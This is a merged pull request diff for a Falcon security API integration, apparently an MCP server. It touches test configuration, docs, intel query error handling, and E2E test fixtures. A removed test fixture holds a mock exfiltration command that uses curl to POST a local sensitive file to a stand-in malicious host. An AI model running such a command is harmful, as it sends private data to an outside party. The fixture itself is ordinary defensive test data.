Skip to content
Merged
2 changes: 2 additions & 0 deletions .env.example
Original file line number Diff line number Diff line change
Expand Up @@ -13,3 +13,5 @@ FALCON_CLIENT_SECRET=your-client-secret
# OPENAI_API_KEY=your-openai-api-key
# OPENAI_BASE_URL=https://your-custom-llm-endpoint.com/v1 # Custom LLM API endpoint for testing
# MODELS_TO_TEST=example-model-1,example-model-2 # Comma-separated list of models to test
# RUNS_PER_TEST=2
# SUCCESS_TRESHOLD=0.7
20 changes: 13 additions & 7 deletions docs/e2e_testing.md
Original file line number Diff line number Diff line change
Expand Up @@ -94,17 +94,23 @@ The E2E tests use a retry mechanism to handle the non-deterministic nature of LL
The retry configuration can be found at the top of `tests/e2e/utils/base_e2e_test.py`:

```python
# Models to test against
MODELS_TO_TEST = ["gpt-4.1-mini", "gpt-4o-mini"]
# Number of times to run each test
RUNS_PER_TEST = 2
# Success threshold for passing a test
SUCCESS_THRESHOLD = 0.7
# Default models to test against
DEFAULT_MODLES_TO_TEST = ["gpt-4.1-mini", "gpt-4o-mini"]
# Default number of times to run each test
DEFAULT_RUNS_PER_TEST = 2
# Default success threshold for passing a test
DEFAULT_SUCCESS_TRESHOLD = 0.7
```

This means each test will run 2 times for each model and the test will pass if at least 70% of the runs succeed.

You can override the models to test using the `MODELS_TO_TEST` environment variable:
Each of these can be overridden by using the appropriate environment variable:

- MODELS_TO_TEST
- RUNS_PER_TEST
- SUCCESS_THRESHOLD

For example:

```bash
# Test with Claude models
Expand Down
42 changes: 21 additions & 21 deletions src/modules/intel.py
Original file line number Diff line number Diff line change
Expand Up @@ -52,7 +52,7 @@ def query_actor_entities(
offset: Optional[int] = Field(default=0, ge=0, description="Starting index of overall result set from which to return ids."),
sort: Optional[str] = Field(default=None, description="The property to sort by. (Ex: created_date|desc)"),
q: Optional[str] = Field(default=None, description="Free text search across all indexed fields."),
) -> Dict[str, Any]:
) -> List[Dict[str, Any]]:
"""Get info about actors that match provided FQL filters.

Args:
Expand Down Expand Up @@ -80,16 +80,21 @@ def query_actor_entities(
logger.debug("Searching actors with params: %s", params)

# Make the API request
response = self.client.command(operation, parameters=params)
command_response = self.client.command(operation, parameters=params)

# Handle the response
return handle_api_response(
response,
api_response = handle_api_response(
command_response,
operation=operation,
error_message="Failed to search actors",
default_result=[]
)

if self._is_error(api_response):
return [api_response]

return api_response

def query_indicator_entities(
self,
filter: Optional[str] = Field(default=None, description="FQL query expression that should be used to limit the results."),
Expand Down Expand Up @@ -131,22 +136,20 @@ def query_indicator_entities(
logger.debug("Searching indicators with params: %s", params)

# Make the API request
response = self.client.command(operation, parameters=params)
command_response = self.client.command(operation, parameters=params)

# Handle the response
result = handle_api_response(
response,
api_response = handle_api_response(
command_response,
operation=operation,
error_message="Failed to search indicators",
default_result=[]
)

# If handle_api_response returns an error dict instead of a list,
# it means there was an error, so we return it wrapped in a list
if isinstance(result, dict) and "error" in result:
return [result]
if self._is_error(api_response):
return [api_response]

return result
return api_response

def query_report_entities(
self,
Expand All @@ -155,7 +158,6 @@ def query_report_entities(
offset: int = Field(default=0, ge=0, description="Starting index of overall result set from which to return ids."),
sort: Optional[str] = Field(default=None, description="The property to sort by. (Ex: created_date|desc)"),
q: Optional[str] = Field(default=None, description="Free text search across all indexed fields."),
include_deleted: Optional[bool] = Field(default=False, description="Flag indicating if both published and deleted reports should be returned."),
) -> List[Dict[str, Any]]:
"""Get info about reports that match provided FQL filters.

Expand All @@ -165,7 +167,6 @@ def query_report_entities(
offset: Starting index of overall result set from which to return ids.
sort: The property to sort by. (Ex: created_date|desc)
q: Free text search across all indexed fields.
include_deleted: Flag indicating if both published and deleted reports should be returned.
fields: The fields to return, or a predefined set of fields in the form of the collection name surrounded by two underscores.

Returns:
Expand All @@ -178,7 +179,6 @@ def query_report_entities(
"offset": offset,
"sort": sort,
"q": q,
"include_deleted": include_deleted,
})

# Define the operation name
Expand All @@ -187,19 +187,19 @@ def query_report_entities(
logger.debug("Searching reports with params: %s", params)

# Make the API request
response = self.client.command(operation, parameters=params)
command_response = self.client.command(operation, parameters=params)

# Handle the response
result = handle_api_response(
response,
api_response = handle_api_response(
command_response,
operation=operation,
error_message="Failed to search reports",
default_result=[]
)

# If handle_api_response returns an error dict instead of a list,
# it means there was an error, so we return it wrapped in a list
if self._is_error(result):
return [result]
if self._is_error(api_response):
return [api_response]

return result
return api_response
61 changes: 21 additions & 40 deletions tests/e2e/modules/test_incidents.py
Original file line number Diff line number Diff line change
Expand Up @@ -24,11 +24,13 @@ async def test_logic():
"validator": lambda kwargs: kwargs.get('parameters', {}).get('limit') == 100,
"response": {
"status_code": 200,
"body": [
{"id": "score-1", "score": 50, "adjusted_score": 60},
{"id": "score-2", "score": 70, "adjusted_score": 80},
{"id": "score-3", "score": 40, "adjusted_score": 50}
]
"body": {
"resources": [
{"id": "score-1", "score": 50, "adjusted_score": 60},
{"id": "score-2", "score": 70, "adjusted_score": 80},
{"id": "score-3", "score": 40, "adjusted_score": 50}
]
}
}
}
]
Expand All @@ -41,7 +43,7 @@ async def test_logic():
def assertions(tools, result):
self.assertGreaterEqual(len(tools), 1, "Expected at least 1 tool call")
used_tool = tools[len(tools) - 1]
self.assertEqual(used_tool['input']['tool_name'], "show_crowd_score")
self.assertEqual(used_tool['input']['tool_name'], "falcon_show_crowd_score")

# Verify the output contains the expected data
output = json.loads(used_tool['output'])
Expand Down Expand Up @@ -71,7 +73,7 @@ async def test_logic():
fixtures = [
{
"operation": "QueryIncidents",
"validator": lambda kwargs: "status:'open'" in kwargs.get('parameters', {}).get('filter', ''),
"validator": lambda kwargs: "state:'open'" in kwargs.get('parameters', {}).get('filter', ''),
"response": {"status_code": 200, "body": {"resources": ["incident-1", "incident-2"]}}
},
{
Expand Down Expand Up @@ -118,15 +120,15 @@ def assertions(tools, result):
self.assertEqual(used_tool['input']['tool_name'], "falcon_search_incidents")

# Verify the tool input contains the filter
tool_input = json.loads(used_tool['input']['tool_input'])
tool_input = used_tool['input']['tool_input']
self.assertIn("open", tool_input.get('filter', '').lower())

# Verify API call parameters
self.assertGreaterEqual(self._mock_api_instance.command.call_count, 2, "Expected at least 2 API calls")

# Check QueryIncidents call
api_call_1_params = self._mock_api_instance.command.call_args_list[0][1].get('parameters', {})
self.assertIn("status:'open'", api_call_1_params.get('filter', ''))
self.assertIn("state:'open'", api_call_1_params.get('filter', ''))

# Check GetIncidents call
api_call_2_body = self._mock_api_instance.command.call_args_list[1][1].get('body', {})
Expand Down Expand Up @@ -184,7 +186,7 @@ def assertions(tools, result):
self.assertEqual(used_tool['input']['tool_name'], "falcon_get_incident_details")

# Verify the tool input contains the incident ID
tool_input = json.loads(used_tool['input']['tool_input'])
tool_input = used_tool['input']['tool_input']
self.assertIn("incident-3", tool_input.get('ids', []))

# Verify API call parameters
Expand All @@ -210,7 +212,7 @@ async def test_logic():
fixtures = [
{
"operation": "QueryBehaviors",
"validator": lambda kwargs: "severity:'critical'" in kwargs.get('parameters', {}).get('filter', ''),
"validator": lambda kwargs: "tactic:'Defense Evasion'" in kwargs.get('parameters', {}).get('filter', ''),
"response": {"status_code": 200, "body": {"resources": ["behavior-1", "behavior-2"]}}
},
{
Expand All @@ -222,21 +224,11 @@ async def test_logic():
"resources": [
{
"id": "behavior-1",
"scenario": "Suspicious Process Activity",
"tactic": "Execution",
"technique": "Command-Line Interface",
"severity": "critical",
"confidence": "high",
"timestamp": "2023-01-15T12:30:00Z"
"tactic": "Defense Evasion",
},
{
"id": "behavior-2",
"scenario": "Suspicious Network Connection",
"tactic": "Command and Control",
"technique": "Non-Standard Port",
"severity": "critical",
"confidence": "medium",
"timestamp": "2023-01-15T13:45:00Z"
"tactic": "Defense Evasion",
}
]
}
Expand All @@ -246,7 +238,7 @@ async def test_logic():

self._mock_api_instance.command.side_effect = self._create_mock_api_side_effect(fixtures)

prompt = "Find all critical severity behaviors"
prompt = "Find behaviors with the tactic 'Defense Evasion'"
return await self._run_agent_stream(prompt)

def assertions(tools, result):
Expand All @@ -255,25 +247,24 @@ def assertions(tools, result):
self.assertEqual(used_tool['input']['tool_name'], "falcon_search_behaviors")

# Verify the tool input contains the filter
tool_input = json.loads(used_tool['input']['tool_input'])
self.assertIn("critical", tool_input.get('filter', '').lower())
tool_input = used_tool['input']['tool_input']
self.assertIn("tactic", tool_input.get('filter', '').lower())

# Verify API call parameters
self.assertGreaterEqual(self._mock_api_instance.command.call_count, 2, "Expected at least 2 API calls")

# Check QueryBehaviors call
api_call_1_params = self._mock_api_instance.command.call_args_list[0][1].get('parameters', {})
self.assertIn("severity:'critical'", api_call_1_params.get('filter', ''))
self.assertIn("tactic:'Defense Evasion'", api_call_1_params.get('filter', ''))

# Check GetBehaviors call
api_call_2_body = self._mock_api_instance.command.call_args_list[1][1].get('body', {})
self.assertEqual(api_call_2_body.get('ids'), ["behavior-1", "behavior-2"])

# Verify result contains behavior information
self.assertIn("behavior-1", result)
self.assertIn("Suspicious Process Activity", result)
self.assertIn("behavior-2", result)
self.assertIn("Suspicious Network Connection", result)
self.assertIn("Defense Evasion", result)

self.run_test_with_retries(
"test_search_behaviors",
Expand All @@ -294,15 +285,7 @@ async def test_logic():
"resources": [
{
"id": "behavior-3",
"scenario": "Data Exfiltration Attempt",
"tactic": "Exfiltration",
"technique": "Data Transfer Size Limits",
"severity": "high",
"confidence": "high",
"timestamp": "2023-03-10T08:15:00Z",
"device_id": "device-123",
"filename": "/tmp/suspicious.bin",
"cmdline": "curl -X POST https://malicious-site.com/upload --data-binary @/tmp/sensitive.dat"
}
]
}
Expand All @@ -321,7 +304,7 @@ def assertions(tools, result):
self.assertEqual(used_tool['input']['tool_name'], "falcon_get_behavior_details")

# Verify the tool input contains the behavior ID
tool_input = json.loads(used_tool['input']['tool_input'])
tool_input = used_tool['input']['tool_input']
self.assertIn("behavior-3", tool_input.get('ids', []))

# Verify API call parameters
Expand All @@ -331,9 +314,7 @@ def assertions(tools, result):

# Verify result contains behavior information
self.assertIn("behavior-3", result)
self.assertIn("Data Exfiltration Attempt", result)
self.assertIn("Exfiltration", result)
self.assertIn("high", result.lower()) # Severity

self.run_test_with_retries(
"test_get_behavior_details",
Expand Down
Loading
Loading